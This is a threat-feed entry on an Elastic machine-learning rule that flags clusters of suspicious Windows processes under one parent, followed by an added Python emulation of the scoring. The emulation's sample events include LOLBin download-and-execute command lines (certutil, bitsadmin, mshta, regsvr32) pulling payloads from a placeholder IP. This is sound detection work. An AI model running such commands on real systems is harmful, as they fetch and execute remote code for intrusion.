{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/tags/ml/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["Elastic Endpoint","Elastic Defend","Winlogbeat"],"_cs_severities":["low"],"_cs_tags":["defense-evasion","windows","ml","lolbins"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eA machine learning job combination has identified a parent process with one or more suspicious Windows processes that exhibit unusually high malicious probability scores. The processes were predicted to be malicious by the ProblemChild supervised ML model and, when clustered, have an unusually high aggregate score according to an unsupervised ML model. This often indicates suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. 
The rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed and Windows process events collected by Elastic Defend or Winlogbeat.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system via an unknown method (e.g., phishing, exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker executes a legitimate Windows process (LOLBin) such as \u003ccode\u003epowershell.exe\u003c/code\u003e or \u003ccode\u003ecmd.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe LOLBin is used to execute a malicious payload or script.\u003c/li\u003e\n\u003cli\u003eThe malicious script spawns additional child processes under the same parent process, creating a process cluster that the job can aggregate by parent process name.\u003c/li\u003e\n\u003cli\u003eThe ProblemChild supervised ML model assigns each spawned process a high malicious probability score.\u003c/li\u003e\n\u003cli\u003eAn unsupervised ML model detects that the summed score of the process cluster is unusually high compared with the parent\u0026rsquo;s normal behaviour.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the spawned processes to perform malicious activities, such as data exfiltration or lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eBecause the abused binaries are legitimate, signed Windows components, this activity can evade traditional signature-based detections; if the ML rule is not enabled or its alerts are not investigated, the attacker can execute commands, download malware, or perform other malicious actions on the endpoint while blending in with legitimate system processes.
The specific impact depends on the attacker\u0026rsquo;s objective but can include data theft, system compromise, or deployment of ransomware.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnsure the Living off the Land (LotL) Attack Detection integration assets are installed and configured correctly, as detailed in the rule\u0026rsquo;s setup instructions.\u003c/li\u003e\n\u003cli\u003eDeploy the detection logic from this brief by enabling the associated machine learning job combination (\u003ccode\u003eproblem_child_high_sum_by_parent_ea\u003c/code\u003e) within Elastic Security.\u003c/li\u003e\n\u003cli\u003eInvestigate alerts generated by this rule by following the investigation steps outlined in the rule\u0026rsquo;s documentation. Pay close attention to the parent process name and the command-line arguments of the suspicious processes.\u003c/li\u003e\n\u003cli\u003eTune the anomaly threshold (\u003ccode\u003eanomaly_threshold = 75\u003c/code\u003e) to reduce false positives in your specific environment. Consider whitelisting known safe tools by creating exceptions for their parent process names.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-15T18:08:23Z","date_published":"2026-05-15T18:08:23Z","id":"https://feed.craftedsignal.io/briefs/2026-05-problemchild-suspicious-process/","summary":"A machine learning job has identified a parent process spawning one or more suspicious Windows processes exhibiting unusually high malicious probability scores, indicating potential defense evasion tactics like masquerading and LOLBins usage.","title":"Suspicious Windows Process Cluster Detected from Parent Process","url":"https://feed.craftedsignal.io/briefs/2026-05-problemchild-suspicious-process/"}],"language":"en","title":"CraftedSignal Threat Feed — Ml","version":"https://jsonfeed.org/version/1.1"}
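Worked example of the aggregation logic the brief describes, added here and not part of the CraftedSignal feed or Elastic's ProblemChild/LotL integration. The supervised model's output is taken as given (constructed `prob` values standing in for the `problemchild.prediction_probability` field, which is an assumed name), the "sum by parent" step is implemented literally, and the unsupervised job is replaced by a robust z-score against a constructed baseline of per-parent sums. The events, hosts, baseline and the score scale of ten points per sigma are all constructed for illustration; the `anomaly_threshold = 75` and the parent-name exception mirror the tuning advice in the Recommendation list.

```python
"""Emulation of a 'high sum of ProblemChild scores by parent process' detection.

Added example: not Elastic's code and not the real ML job. The supervised
output is constructed; the unsupervised step is a median/MAD z-score over
a constructed baseline. Field names are ECS-like but assumed.
"""
from collections import defaultdict
from statistics import median

ANOMALY_THRESHOLD = 75        # the rule's anomaly_threshold
MALICIOUS_PROB_CUTOFF = 0.5   # assumption: the model's prediction==1 above this

# Constructed Windows process events (host, parent, child, args, ProblemChild probability)
EVENTS = [
    # ws01: powershell.exe drives a chain of classic LOLBins
    {"host": "ws01", "parent": "powershell.exe", "name": "certutil.exe",
     "args": "certutil -urlcache -split -f http://203.0.113.5/a.txt a.txt", "prob": 0.93},
    {"host": "ws01", "parent": "powershell.exe", "name": "bitsadmin.exe",
     "args": "bitsadmin /transfer j /download http://203.0.113.5/b.dll b.dll", "prob": 0.88},
    {"host": "ws01", "parent": "powershell.exe", "name": "rundll32.exe",
     "args": "rundll32 b.dll,DllMain", "prob": 0.97},
    {"host": "ws01", "parent": "powershell.exe", "name": "mshta.exe",
     "args": "mshta http://203.0.113.5/c.hta", "prob": 0.91},
    {"host": "ws01", "parent": "powershell.exe", "name": "regsvr32.exe",
     "args": "regsvr32 /s /u /i:http://203.0.113.5/d.sct scrobj.dll", "prob": 0.85},
    # ws02: ordinary activity, one mildly suspicious child
    {"host": "ws02", "parent": "svchost.exe", "name": "wmiprvse.exe",
     "args": "wmiprvse.exe -secured -Embedding", "prob": 0.62},
    {"host": "ws02", "parent": "explorer.exe", "name": "chrome.exe",
     "args": "chrome.exe --profile-directory=Default", "prob": 0.12},
    # ws03: a software-deployment agent legitimately running scripts (false-positive source)
    *[{"host": "ws03", "parent": "ccmexec.exe", "name": "powershell.exe",
       "args": f"powershell -ExecutionPolicy Bypass -File C:\\Windows\\ccmcache\\{i}\\fix.ps1",
       "prob": 0.95} for i in range(5)],
]

# Constructed baseline: typical per-parent score sums seen over the last two weeks
BASELINE_SUMS = [0.0, 0.3, 0.6, 0.9, 1.2, 0.4, 0.7]


def sum_scores_by_parent(events, cutoff=MALICIOUS_PROB_CUTOFF):
    """Group events the supervised model predicted malicious by (host, parent)
    and sum their probabilities; several moderately suspicious children under
    one parent add up to a high total even if none is individually alarming."""
    clusters = defaultdict(lambda: {"sum": 0.0, "children": []})
    for ev in events:
        if ev["prob"] < cutoff:
            continue                       # predicted benign: not part of any cluster
        key = (ev["host"], ev["parent"])
        clusters[key]["sum"] += ev["prob"]
        clusters[key]["children"].append(ev)
    return dict(clusters)


def anomaly_score(value, baseline):
    """Stand-in for the unsupervised job: robust z-score mapped onto 0..100.
    median/MAD is used so that a few past incidents in the baseline do not
    raise the bar; ten points per sigma is an assumed scale."""
    med = median(baseline)
    mad = median(abs(b - med) for b in baseline) or 1e-6
    z = (value - med) / (1.4826 * mad)
    return max(0.0, min(100.0, 10.0 * z))


def detect(events, baseline=BASELINE_SUMS, threshold=ANOMALY_THRESHOLD,
           allowlist=frozenset()):
    """Return alerts for clusters whose anomaly score reaches the threshold,
    skipping parents the analyst has excepted (the tuning step in the brief)."""
    alerts = []
    for (host, parent), c in sum_scores_by_parent(events).items():
        if parent.lower() in allowlist:
            continue
        score = anomaly_score(c["sum"], baseline)
        if score >= threshold:
            alerts.append({"host": host, "parent": parent,
                           "sum": round(c["sum"], 2), "score": round(score, 1),
                           "children": [(e["name"], e["args"]) for e in c["children"]]})
    return alerts


if __name__ == "__main__":
    # Without an exception ccmexec.exe on ws03 alerts too; with it only ws01 remains.
    for a in detect(EVENTS, allowlist=frozenset({"ccmexec.exe"})):
        print(f"[{a['score']}] {a['host']} parent={a['parent']} sum={a['sum']}")
        for name, args in a["children"]:
            print(f"    {name}: {args}")
```

Running it with no allowlist flags both `ws01/powershell.exe` and `ws03/ccmexec.exe`; adding `ccmexec.exe` as a parent-name exception removes the deployment agent while the powershell.exe cluster (five children, summed score 4.54) still scores well above 75. The child command lines carried in each alert are what the brief tells you to look at first during triage.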